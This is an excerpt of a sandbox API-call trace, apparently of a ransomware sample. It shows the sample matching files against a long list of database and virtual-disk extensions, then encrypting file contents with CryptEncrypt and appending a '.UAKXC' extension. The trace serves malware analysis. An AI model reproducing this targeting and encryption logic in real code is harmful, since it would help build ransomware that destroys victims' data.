(lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".owc") returned 0x0 [0159.576] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".p96") returned 0x0 [0159.576] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".p97") returned 0x0 [0159.576] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pan") returned 0x0 [0159.576] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pdb") returned 0x0 [0159.576] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pdm") returned 0x0 [0159.576] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pnz") returned 0x0 [0159.576] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".qry") returned 0x0 [0159.576] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".qvd") returned 0x0 [0159.576] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rbf") returned 0x0 [0159.576] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rctd") returned 0x0 [0159.576] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rod") returned 0x0 [0159.576] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rodx") returned 0x0 [0159.576] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rpd") returned 0x0 [0159.576] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".rsd") returned 0x0 [0159.577] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sas7bdat") returned 0x0 [0159.577] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sbf") returned 0x0 [0159.577] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".scx") returned 0x0 [0159.577] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sdb") returned 0x0 [0159.577] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sdc") returned 0x0 [0159.577] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sdf") returned 0x0 [0159.577] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sis") returned 0x0 [0159.577] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".spq") returned 0x0 [0159.577] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sql") returned 0x0 [0159.577] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sqlite") returned 0x0 [0159.577] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sqlite3") returned 0x0 [0159.577] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".sqlitedb") returned 0x0 [0159.577] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".te") returned 0x0 [0159.577] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".temx") returned 0x0 [0159.577] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".tmd") returned 0x0 [0159.577] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".tps") returned 0x0 [0159.577] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".trc") returned 0x0 [0159.577] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".trm") returned 0x0 [0159.577] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".udb") returned 0x0 [0159.577] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".udl") returned 0x0 [0159.577] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".usr") returned 0x0 [0159.577] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".v12") returned 0x0 [0159.578] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vis") returned 0x0 [0159.578] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vpd") returned 0x0 [0159.578] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vvv") returned 0x0 [0159.578] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".wdb") returned 0x0 [0159.578] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".wmdb") returned 0x0 [0159.578] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".wrk") returned 0x0 [0159.578] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".xdb") returned 0x0 [0159.578] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".xld") returned 0x0 [0159.578] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".xmlff") returned 0x0 [0159.578] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".abcddb") returned 0x0 [0159.578] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".abs") returned 0x0 [0159.578] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".abx") returned 0x0 [0159.578] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".accdw") returned 0x0 [0159.578] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".adn") returned 0x0 [0159.578] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".db2") returned 0x0 [0159.578] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".fm5") returned 0x0 [0159.578] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".hjt") returned 0x0 [0159.578] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".icg") returned 0x0 [0159.578] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".icr") returned 0x0 [0159.578] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kdb") returned 0x0 [0159.578] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".lut") returned 0x0 [0159.578] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".maw") returned 0x0 [0159.578] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdn") returned 0x0 [0159.578] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdt") returned 0x0 [0159.578] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vdi") returned 0x0 [0159.579] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vhd") returned 0x0 [0159.579] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmdk") returned 0x0 [0159.579] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pvm") returned 0x0 [0159.579] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmem") returned 0x0 [0159.579] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmsn") returned 0x0 [0159.579] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmsd") returned 0x0 [0159.579] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nvram") returned 0x0 [0159.579] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmx") returned 0x0 [0159.579] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".raw") returned 0x0 [0159.579] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".qcow2") returned 0x0 [0159.579] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".subvol") returned 0x0 [0159.579] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".bin") returned 0x0 [0159.579] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vsv") returned 0x0 [0159.579] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".avhd") returned 0x0 [0159.579] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmrs") returned 0x0 [0159.579] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vhdx") returned 0x0 [0159.579] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".avdx") returned 0x0 [0159.579] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmcx") returned 0x0 [0159.579] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".iso") returned 0x0 [0159.579] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.580] WriteFile (in: hFile=0x714, lpBuffer=0x383fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x383fc78, lpOverlapped=0x0 | out: lpBuffer=0x383fd70*, lpNumberOfBytesWritten=0x383fc78*=0x20c, lpOverlapped=0x0) returned 1 [0159.582] WriteFile (in: hFile=0x714, lpBuffer=0x383fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x383fc7c, lpOverlapped=0x0 | out: lpBuffer=0x383fc80*, lpNumberOfBytesWritten=0x383fc7c*=0xa, lpOverlapped=0x0) returned 1 [0159.583] SetEndOfFile (hFile=0x714) returned 1 [0159.583] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.583] ReadFile (in: hFile=0x714, lpBuffer=0x4610000, nNumberOfBytesToRead=0x1861, lpNumberOfBytesRead=0x383fc88, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesRead=0x383fc88*=0x1861, lpOverlapped=0x0) returned 1 [0159.584] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0xffffe79f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.584] WriteFile (in: hFile=0x714, lpBuffer=0x4610000*, nNumberOfBytesToWrite=0x1861, lpNumberOfBytesWritten=0x383fc44, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesWritten=0x383fc44*=0x1861, lpOverlapped=0x0) returned 1 [0159.584] CloseHandle (hObject=0x714) returned 1 [0159.586] GetProcessHeap () returned 0xea0000 [0159.586] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0x77950d0 [0159.586] lstrcpyW (in: lpString1=0x77950d0, lpString2="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" [0159.586] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".UAKXC" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.UAKXC") returned="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.UAKXC" [0159.586] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.UAKXC" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.uakxc")) returned 1 [0159.590] GetProcessHeap () returned 0xea0000 [0159.590] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77950d0 | out: hHeap=0xea0000) returned 1 [0159.590] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef6298 | out: hHeap=0xea0000) returned 1 [0159.590] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2da8 | out: hHeap=0xea0000) returned 1 [0159.590] CryptGenRandom (in: hProv=0xeced80, dwLen=0x20, pbBuffer=0x383fd50 | out: pbBuffer=0x383fd50) returned 1 [0159.590] CryptGenRandom (in: hProv=0xeced80, dwLen=0x8, pbBuffer=0x383fd48 | out: pbBuffer=0x383fd48) returned 1 [0159.590] CryptEncrypt (in: hKey=0xececd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x200) returned 1 [0159.591] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab")) returned 0x2020 [0159.591] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x714 [0159.591] GetLastError () returned 0x0 [0159.591] GetFileSizeEx (in: hFile=0x714, lpFileSize=0x383fc88 | out: lpFileSize=0x383fc88*=50823389) returned 1 [0159.591] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".4dd") returned 0x0 [0159.591] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".4dl") returned 0x0 [0159.591] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".accdb") returned 0x0 [0159.592] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".accdc") returned 0x0 [0159.592] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".accde") returned 0x0 [0159.592] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".accdr") returned 0x0 [0159.592] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".accdt") returned 0x0 [0159.592] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".accft") returned 0x0 [0159.592] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".adb") returned 0x0 [0159.592] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".ade") returned 0x0 [0159.592] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".adf") returned 0x0 [0159.592] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".adp") returned 0x0 [0159.592] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".arc") returned 0x0 [0159.592] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".ora") returned 0x0 [0159.592] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".alf") returned 0x0 [0159.592] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".ask") returned 0x0 [0159.592] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".btr") returned 0x0 [0159.592] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".bdf") returned 0x0 [0159.592] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".cat") returned 0x0 [0159.592] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".cdb") returned 0x0 [0159.592] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".ckp") returned 0x0 [0159.592] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".cma") returned 0x0 [0159.592] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".cpd") returned 0x0 [0159.593] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".dacpac") returned 0x0 [0159.593] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".dad") returned 0x0 [0159.593] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".dadiagrams") returned 0x0 [0159.593] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".daschema") returned 0x0 [0159.593] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".db") returned 0x0 [0159.593] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".db-shm") returned 0x0 [0159.593] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".db-wal") returned 0x0 [0159.593] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".db3") returned 0x0 [0159.593] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".dbc") returned 0x0 [0159.593] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".dbf") returned 0x0 [0159.593] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".dbs") returned 0x0 [0159.593] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".dbt") returned 0x0 [0159.593] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".dbv") returned 0x0 [0159.593] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".dbx") returned 0x0 [0159.593] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".dcb") returned 0x0 [0159.593] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".dct") returned 0x0 [0159.593] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".dcx") returned 0x0 [0159.593] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".ddl") returned 0x0 [0159.593] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".dlis") returned 0x0 [0159.593] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".dp1") returned 0x0 [0159.593] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".dqy") returned 0x0 [0159.593] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".dsk") returned 0x0 [0159.594] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".dsn") returned 0x0 [0159.594] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".dtsx") returned 0x0 [0159.594] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".dxl") returned 0x0 [0159.594] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".eco") returned 0x0 [0159.594] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".ecx") returned 0x0 [0159.594] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".edb") returned 0x0 [0159.594] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".epim") returned 0x0 [0159.594] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".exb") returned 0x0 [0159.594] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".fcd") returned 0x0 [0159.594] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".fdb") returned 0x0 [0159.594] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".fic") returned 0x0 [0159.594] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".fmp") returned 0x0 [0159.594] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".fmp12") returned 0x0 [0159.594] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".fmpsl") returned 0x0 [0159.594] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".fol") returned 0x0 [0159.594] StrStrIW (lpFirst="C:\\MSOCache\\All 